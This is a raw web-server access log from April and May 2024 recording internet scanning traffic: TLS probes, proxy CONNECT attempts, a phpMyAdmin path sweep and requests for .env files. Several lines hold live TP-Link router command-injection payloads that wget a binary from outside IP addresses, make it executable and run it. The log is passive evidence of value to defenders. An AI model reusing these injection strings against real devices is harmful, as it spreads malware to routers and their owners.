19:40:53] code 404, message File not found 138.197.15.3 - - [30/Apr/2024 19:40:53] "GET /aaa9 HTTP/1.1" 404 - 138.197.15.3 - - [30/Apr/2024 19:40:56] code 404, message File not found 138.197.15.3 - - [30/Apr/2024 19:40:56] "GET /aab8 HTTP/1.1" 404 - 138.197.15.3 - - [30/Apr/2024 19:41:02] "GET / HTTP/1.1" 200 - 198.235.24.45 - - [30/Apr/2024 19:53:57] "GET / HTTP/1.0" 200 - 87.121.69.52 - - [30/Apr/2024 20:16:00] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [30/Apr/2024 20:16:00] "CONNECT google.com:443 HTTP/1.1" 501 - 198.235.24.173 - - [30/Apr/2024 20:36:21] code 400, message Bad request version ('"Øå') 198.235.24.173 - - [30/Apr/2024 20:36:21] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03\x9baùwê_Ú\x8e\x9c\x9cá7-δ\x03ª\x12-\x05+Ah¿\x0c\x0f)fû\x86$\x99 d\x09"Øå" 400 - 198.235.24.173 - - [30/Apr/2024 20:36:21] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.173 - - [30/Apr/2024 20:36:21] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03Â\x12\x97\x9b\x13iü\x81´Ï?\x8cWhRÅ\x85\x06+Êù¢\x9d\x1d\x02úåÉ\x81\x9aU\x15\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 84.54.51.41 - - [30/Apr/2024 21:17:31] code 404, message File not found 84.54.51.41 - - [30/Apr/2024 21:17:31] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 146.19.24.28 - - [30/Apr/2024 21:27:36] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [30/Apr/2024 21:35:18] "GET / HTTP/1.1" 200 - 87.246.7.62 - - [30/Apr/2024 22:36:23] "GET / HTTP/1.0" 200 - 120.85.115.183 - - [30/Apr/2024 22:37:46] code 501, message Unsupported method ('POST') 120.85.115.183 - - [30/Apr/2024 22:37:46] "POST /GponForm/diag_Form?images/ HTTP/1.1" 501 - 185.161.248.199 - - [30/Apr/2024 22:47:39] "GET / HTTP/1.1" 200 - 141.98.11.79 - - [30/Apr/2024 23:36:09] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [30/Apr/2024 23:36:09] "CONNECT google.com:443 HTTP/1.1" 501 - 185.224.128.43 - - [30/Apr/2024 23:50:21] "GET / HTTP/1.1" 200 - 84.54.51.41 - - [01/May/2024 00:17:16] code 404, message File not found 84.54.51.41 - - [01/May/2024 00:17:16] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 34.76.158.233 - - [01/May/2024 00:35:05] "GET / HTTP/1.1" 200 - 195.1.144.109 - - [01/May/2024 00:40:58] code 404, message File not found 195.1.144.109 - - [01/May/2024 00:40:58] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://179.43.190.218/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 84.54.51.41 - - [01/May/2024 00:49:12] code 404, message File not found 84.54.51.41 - - [01/May/2024 00:49:12] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 179.43.190.218 - - [01/May/2024 00:55:51] code 404, message File not found 179.43.190.218 - - [01/May/2024 00:55:51] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F179.43.190.218%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 87.246.7.62 - - [01/May/2024 01:24:03] code 404, message File not found 87.246.7.62 - - [01/May/2024 01:24:03] "GET /cgi/conf.bin HTTP/1.1" 404 - 87.121.69.52 - - [01/May/2024 02:30:16] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [01/May/2024 02:30:16] "CONNECT google.com:443 HTTP/1.1" 501 - 119.28.122.223 - - [01/May/2024 02:53:04] code 400, message Bad request version ('À#À¬À®À+À') 119.28.122.223 - - [01/May/2024 02:53:04] "\x16\x03\x03\x01¨\x01\x00\x01¤\x03\x03pÊ\x88\x19Ø]ö²¡Ò\x06\x0cxµjP^\x9f\x86½ú\x0f»\x0f*\x11\x93ÕÕl\x9a· §¨-ðàv,\x07ÝPk"özÌã(ëç#Ôõ£+d\x00­0G{,\x1a\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 119.28.122.223 - - [01/May/2024 02:53:04] code 400, message Bad request version ('À\\x9c\\x00<\\x00/\\x00') 119.28.122.223 - - [01/May/2024 02:53:04] "\x16\x03\x03\x01¨\x01\x00\x01¤\x03\x03RÜ>UùcKÀÓ\x16\x12CW\x1d\x0bªäÍ\x8d¯{Õj®¹m¦\x85ìHÕ& ²\x14\x83У\x0eÚµ\\\x06IÑa\x87zÌ©òÒ±\x8aí(\x18\x8f\x1c\x8bQX\x18\x00/\x00\x8a\x00\x05\x00\x04\x00\x07\x00À\x00\x84\x00º\x00A\x00\x9dÀ¡À\x9d\x00=\x005\x00\x9cÀ À\x9c\x00<\x00/\x00" 400 - 119.28.122.223 - - [01/May/2024 02:53:05] code 400, message Bad request version ('¬!V\\'®\\x08"\\x7f@.쥬\\x93ê\\x96I5;k\\x8dmF\\x8enê\\x8d\\x87É\\x00FÀ\\x12À\\x07Ì\\x14\\x13\\x01\\x13\\x02Ì©ÀsÀrÀ,À¯À\\xadÀ$À') 119.28.122.223 - - [01/May/2024 02:53:05] "\x16\x03\x03\x01Y\x01\x00\x01U\x03\x03J\\oþ5^ªÞ±áÒù°ØT?Ñ|%Ï,Z\x15yp\x98JÏ\x9b^\x0eµ \x1a\x0f\x1f¬!V'®\x08"\x7f@.쥬\x93ê\x96I5;k\x8dmF\x8enê\x8d\x87É\x00FÀ\x12À\x07Ì\x14\x13\x01\x13\x02Ì©ÀsÀrÀ,À¯À­À$À" 400 - 119.28.122.223 - - [01/May/2024 02:53:05] code 400, message Bad request version ("ÁY#°-\\x8f\\x00DÀ\\x13À'À/À\\x14À(À0À`ÀaÀvÀw̨\\x13\\x05\\x13\\x04\\x13\\x03Ì\\x13À\\x11\\x00") 119.28.122.223 - - [01/May/2024 02:53:05] "\x16\x03\x03\x01K\x01\x00\x01G\x03\x03£nê%ù(Ä\\§1\x98\x0f¨îh\x90?ö$rÖ<'ø¤^o\x0f\x1eäre \x05ìöfF¬eSèNÎ$.\x12HÇ\x0e\x81;ø ó*±a ÁY#°-\x8f\x00DÀ\x13À'À/À\x14À(À0À`ÀaÀvÀw̨\x13\x05\x13\x04\x13\x03Ì\x13À\x11\x00" 400 - 119.28.122.223 - - [01/May/2024 02:53:06] code 400, message Bad request version ("e\\xadªáBt?M½æ7\\x02ß)¥ÁKw\\x7f%-ÊQ\\x9a\\x16\\x9c²Iðtux\\x00\\x8c\\x9a\\x9aÀ\\x12À\\x13À\\x07À'Ì\\x14À/\\x13\\x01À\\x14\\x13\\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ\\xad̨À$\\x13\\x05À") 119.28.122.223 - - [01/May/2024 02:53:06] "\x16\x03\x03\x01\x9c\x01\x00\x01\x98\x03\x03=fes\x8bÞF:iS\x985rÔ·2p\x13\x19¬\x1e\x1eÙY\x14°BýnÄ²Ó e­ªáBt?M½æ7\x02ß)¥ÁKw\x7f%-ÊQ\x9a\x16\x9c²Iðtux\x00\x8c\x9a\x9aÀ\x12À\x13À\x07À'Ì\x14À/\x13\x01À\x14\x13\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ­Ì¨À$\x13\x05À" 400 - 119.28.122.223 - - [01/May/2024 02:53:06] code 400, message Bad request version ('À#À¬À®À+À') 119.28.122.223 - - [01/May/2024 02:53:06] "\x16\x03\x02\x01\x9d\x01\x00\x01\x99\x03\x02åúp\x08Ç\x87¡|\x10Å\x1aÉeØ-ÃU»èu¤\x82S\x90là\x10\x14\x17·\x91\x09 7÷Ð¥K£¢ö\x14NݢѪ+\x94ʸ*ÏðN\x92\x97\x94øÉn\x0d £,\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 119.28.122.223 - - [01/May/2024 02:53:07] code 400, message Bad request version ('À#À¬À®À+À') 119.28.122.223 - - [01/May/2024 02:53:07] "\x16\x03\x01\x01ª\x01\x00\x01¦\x03\x035ÛUiïºzH®\x10°\x16\\\x0beJ\x102´êS{\x1b¯¨\x96I\x9f\x92o\x7fD ¨\x7f©=]\x0e\x01!\x82´I@\x8c\x05ÁÛ\x93\x98¢l\x08Äáó8æR\x7f(^ÈK\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 119.28.122.223 - - [01/May/2024 02:53:07] code 400, message Bad request version ('À\\x9c\\x00<\\x00/\\x00') 119.28.122.223 - - [01/May/2024 02:53:07] "\x16\x03\x01\x01ª\x01\x00\x01¦\x03\x03òÃc\x9bà\x83\x0e9-\x87I\x83á\x00´c\x1e\x81m;<)\x94}Qô7\x11_Lù¶ #Ð=úäÓ\x81\x7f=ÿ=3\x93\x10 \x89\x16á,\x09\x0e\x88\x92d\x81%ÀV0¡\x0f4\x00\x8a\x00\x05\x00\x04\x00\x07\x00À\x00\x84\x00º\x00A\x00\x9dÀ¡À\x9d\x00=\x005\x00\x9cÀ À\x9c\x00<\x00/\x00" 400 - 119.28.122.223 - - [01/May/2024 02:53:08] code 400, message Bad request version ('À#À¬À®À+À') 119.28.122.223 - - [01/May/2024 02:53:08] "\x16\x03\x01\x01 \x01\x00\x01\x9c\x03\x03\x8c@;¬ÃÃ)õÑ¥ãHq\x91ñ>\x96¨ûX´>\x82_\x07u,¼\x8fýªÆ &jäõ)éë\x92=\x9bÝ\x07 Î\x1fbÕ¡åß\x92F­jP¥UÂR\x9bâ\x0b\x00\x80\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 119.28.122.223 - - [01/May/2024 02:53:08] code 400, message Bad request version ("T\\x00T\\x0f¥\\x00\\x8c::À\\x12À\\x13À\\x07À'Ì\\x14À/\\x13\\x01À\\x14\\x13\\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ\\xad̨À$\\x13\\x05À") 119.28.122.223 - - [01/May/2024 02:53:08] "\x16\x03\x01\x01·\x01\x00\x01³\x03\x03\x0eñ`LaÀ¨4i:!Î\x02Hð¯\x85á\x83¡O\x9d­Æd¯$m|Ð\x7fà ó)\x0bbú)r$RI¦ë\x9f·\x90Á£=¦:\x97\x12\x8f\x98@\x9a\x1eT\x00T\x0f¥\x00\x8c::À\x12À\x13À\x07À'Ì\x14À/\x13\x01À\x14\x13\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ­Ì¨À$\x13\x05À" 400 - 119.28.122.223 - - [01/May/2024 02:53:09] code 400, message Bad request version ('À\\x14À') 119.28.122.223 - - [01/May/2024 02:53:09] "\x16\x03\x01\x00\x8f\x01\x00\x00\x8b\x03\x03\x80\x06(\x99$\x1cÝ\x90v-:¼¼&O\x96£\x04øApd0ËN"ö&|l\x1dV\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 119.28.122.223 - - [01/May/2024 02:53:09] code 400, message Bad request version ('À\\x14À') 119.28.122.223 - - [01/May/2024 02:53:09] "\x16\x03\x01\x00\x8f\x01\x00\x00\x8b\x03\x03T3\x08Æø\x85Õ#½\x87\x8a(R2]iNH\x14ahf\x01~¨@ÎÅ«\x9dDú\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 119.28.122.223 - - [01/May/2024 02:53:09] code 400, message Bad request version ('À\\x13À') 119.28.122.223 - - [01/May/2024 02:53:09] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x03\x82²E¡5­\x1d.v\x09Eä\x8a\x1b5¸´âûÁ\x89Ê{*\x0c´2\x84¡Ð\x8c? 9ømfN\x97×Âs\x91ø\x97uz(®óO Ö\x07!\x1dÁ¬é7\x0e\x06¨oA\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 119.28.122.223 - - [01/May/2024 02:53:10] code 400, message Bad request version ('À#À¬À®À+À') 119.28.122.223 - - [01/May/2024 02:53:10] "\x16\x03\x03\x01¨\x01\x00\x01¤\x03\x03Ç?z;\x83È°\x8d#]c¾¨7,ð\x01úÉ\x09>b0\x87Ácb\x04νǡ \x1dð&\x1c\x8ec:ÜUs\x9c\x8b(\x970Éý)©9\x94ì,±\x19\x87°\x8cÇÞRº\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 119.28.122.223 - - [01/May/2024 02:53:10] code 400, message Bad request version ('À\\x9c\\x00<\\x00/\\x00') 119.28.122.223 - - [01/May/2024 02:53:10] "\x16\x03\x03\x01¨\x01\x00\x01¤\x03\x03HC«J\x82âT­ª²\x0d\x06`Â\x86Æüù\x02õÂ\\©ïØ6ºh\x91\\gÄ fH¦\x88qu¯©\x1d»_ÁE.dù\x7f\x1c/-¸\x80ë\x08ñ{wç4G+p\x00\x8a\x00\x05\x00\x04\x00\x07\x00À\x00\x84\x00º\x00A\x00\x9dÀ¡À\x9d\x00=\x005\x00\x9cÀ À\x9c\x00<\x00/\x00" 400 - 119.28.122.223 - - [01/May/2024 02:53:11] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x03\\x01Y\\x01\\x00\\x01U\\x03\\x03b·á-µÀÉFü#\x00°vä»|0©+ã\x9b*\x00\x8a\x00\x05\x00\x04\x00\x07\x00À\x00\x84\x00º\x00A\x00\x9dÀ¡À\x9d\x00=\x005\x00\x9cÀ À\x9c\x00<\x00/\x00" 400 - 119.28.122.223 - - [01/May/2024 02:53:14] code 400, message Bad request version ('À#À¬À®À+À') 119.28.122.223 - - [01/May/2024 02:53:14] "\x16\x03\x01\x01 \x01\x00\x01\x9c\x03\x03bt¾\x93$su\x8dº¸È"\x8b˪d\x0d\x98Ç3\x05ßg\x08ÁØ\x8b\x19\x0bÎ\x02\x96 *¾äM\x95\x05\x94V\x94Ëw¥øvÑÚ\x12HÃÀÚR7\x99\x13OFÔ,¦\x17\x02\x00\x80\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 119.28.122.223 - - [01/May/2024 02:53:14] code 400, message Bad request version ("\\x00\\x8cjjÀ\\x12À\\x13À\\x07À'Ì\\x14À/\\x13\\x01À\\x14\\x13\\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ\\xad̨À$\\x13\\x05À") 119.28.122.223 - - [01/May/2024 02:53:14] "\x16\x03\x01\x01·\x01\x00\x01³\x03\x03Â\x7f I'Õ\x17²B\x84\x03ì`;cæ=ê\x7f´zéþÂH#ã»Ì~Ù yµÒ\x13\x89>×,\x99\x10´\x91\x0d\x1eE¿ÐBþ%ËÉöéy4Ñê\x14°\x9e\x1e\x00\x8cjjÀ\x12À\x13À\x07À'Ì\x14À/\x13\x01À\x14\x13\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ­Ì¨À$\x13\x05À" 400 - 119.28.122.223 - - [01/May/2024 02:53:14] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00\\x8f\\x01\\x00\\x00\\x8b\\x03\\x03ûÕ\\x8b¸åa³ªo\\x8eТÉÆ+FįOóªXQ#Q_E\\x94Su\\x8e¨\\x00\\x00\\x1aÀ/À+À\\x11À\\x07À\\x13À') 119.28.122.223 - - [01/May/2024 02:53:14] "\x16\x03\x01\x00\x8f\x01\x00\x00\x8b\x03\x03ûÕ\x8b¸åa³ªo\x8eТÉÆ+FįOóªXQ#Q_E\x94Su\x8e¨\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 119.28.122.223 - - [01/May/2024 02:53:15] code 400, message Bad request version ('À\\x14À') 119.28.122.223 - - [01/May/2024 02:53:15] "\x16\x03\x01\x00\x8f\x01\x00\x00\x8b\x03\x03\x84\x06\x0f©ë\x0e\x81âZ\x9cÃ2\x18r a\x0eH\x85³ùêO(^»Rc\x84¨b\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 119.28.122.223 - - [01/May/2024 02:53:15] code 400, message Bad request version ('À\\x13À') 119.28.122.223 - - [01/May/2024 02:53:15] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x03ò&£È\x07Ê\x0dð»1\x09è\x8375\x0d\x86{\x0cÓ¿P\x91\x16_Ä\x80\x19QD\x8aÅ wüàBjôc@¤ÿ\x95K\x87ê[µÛÙÔ\x17TvkÎ\x0eÜ\x96[\x7f\x99Úk\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 87.246.7.62 - - [01/May/2024 02:57:27] "GET / HTTP/1.0" 200 - 167.172.111.146 - - [01/May/2024 03:35:15] code 400, message Bad request version ("rÅÒþ\\x98Ù\\x9f<Ú°â8NVÆ\\x9b.\\x10Ö6Ç\\x88\\x00>\\x13\\x02\\x13\\x03\\x13\\x01À,À0\\x00\\x9f̨̩̪À+À/\\x00\\x9eÀ$À(\\x00kÀ#À'\\x00gÀ") 167.172.111.146 - - [01/May/2024 03:35:15] "\x16\x03\x01\x01$\x01\x00\x01 \x03\x03?Ë\x87Ç\x045\x17!U\x03Ì]\x0b\x1c(äsÇ1Lf»+\x05ô\x06?L\x08\x9f¬0 \x95ÌÔ§Ô×öѪ rÅÒþ\x98Ù\x9f<Ú°â8NVÆ\x9b.\x10Ö6Ç\x88\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9f̨̩̪À+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ" 400 - 3.101.240.116 - - [01/May/2024 04:03:06] "GET / HTTP/1.1" 200 - 106.75.174.148 - - [01/May/2024 04:13:54] code 404, message File not found 106.75.174.148 - - [01/May/2024 04:13:54] "GET /.DS_Store HTTP/1.1" 404 - 185.224.128.43 - - [01/May/2024 04:29:50] "GET / HTTP/1.1" 200 - 43.135.155.251 - - [01/May/2024 04:37:50] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:50] "GET http://203.219.129.101:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:51] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:51] "GET http://203.219.129.101:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:51] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:51] "GET http://203.219.129.101:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:51] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:51] "GET http://203.219.129.101:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:52] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:52] "GET http://203.219.129.101:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:52] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:52] "GET http://203.219.129.101:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:52] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:52] "GET http://203.219.129.101:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:53] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:53] "GET http://203.219.129.101:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:53] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:53] "GET http://203.219.129.101:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:53] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:53] "GET http://203.219.129.101:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:53] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:53] "GET http://203.219.129.101:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:54] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:54] "GET http://203.219.129.101:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:54] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:54] "GET http://203.219.129.101:80/pma/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:54] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:54] "GET http://203.219.129.101:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:55] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:55] "GET http://203.219.129.101:80/myadmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:55] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:55] "GET http://203.219.129.101:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:55] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:55] "GET http://203.219.129.101:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:56] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:56] "GET http://203.219.129.101:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:56] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:56] "GET http://203.219.129.101:80/SQL/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:56] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:56] "GET http://203.219.129.101:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:57] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:57] "GET http://203.219.129.101:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:57] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:57] "GET http://203.219.129.101:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:57] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:57] "GET http://203.219.129.101:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:58] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:58] "GET http://203.219.129.101:80/admin/pma/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:58] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:58] "GET http://203.219.129.101:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:58] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:58] "GET http://203.219.129.101:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:59] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:59] "GET http://203.219.129.101:80/webadmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:59] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:59] "GET http://203.219.129.101:80/admin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:37:59] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:37:59] "GET http://203.219.129.101:80/dbadmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:00] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:00] "GET http://203.219.129.101:80/mysql/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:00] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:00] "GET http://203.219.129.101:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:00] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:00] "GET http://203.219.129.101:80/phpma/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:01] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:01] "GET http://203.219.129.101:80/sqlweb/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:01] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:01] "GET http://203.219.129.101:80/webdb/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:01] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:01] "GET http://203.219.129.101:80/websql/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:02] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:02] "GET http://203.219.129.101:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:02] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:02] "GET http://203.219.129.101:80/php/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:02] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:02] "GET http://203.219.129.101:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:03] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:03] "GET http://203.219.129.101:80/db/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:03] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:03] "GET http://203.219.129.101:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:03] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:03] "GET http://203.219.129.101:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:04] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:04] "GET http://203.219.129.101:80/phpmanager/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:04] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:04] "GET http://203.219.129.101:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:04] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:04] "GET http://203.219.129.101:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 - 43.135.155.251 - - [01/May/2024 04:38:05] code 404, message File not found 43.135.155.251 - - [01/May/2024 04:38:05] "GET http://203.219.129.101:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 - 146.19.24.28 - - [01/May/2024 04:45:26] "GET / HTTP/1.1" 200 - 103.245.236.120 - - [01/May/2024 04:46:52] code 404, message File not found 103.245.236.120 - - [01/May/2024 04:46:52] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 - 185.224.128.31 - - [01/May/2024 04:49:20] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [01/May/2024 04:57:10] "GET / HTTP/1.1" 200 - 203.55.81.13 - - [01/May/2024 05:07:31] code 404, message File not found 203.55.81.13 - - [01/May/2024 05:07:31] "GET /.env HTTP/1.1" 404 - 203.55.81.13 - - [01/May/2024 05:07:31] code 404, message File not found 203.55.81.13 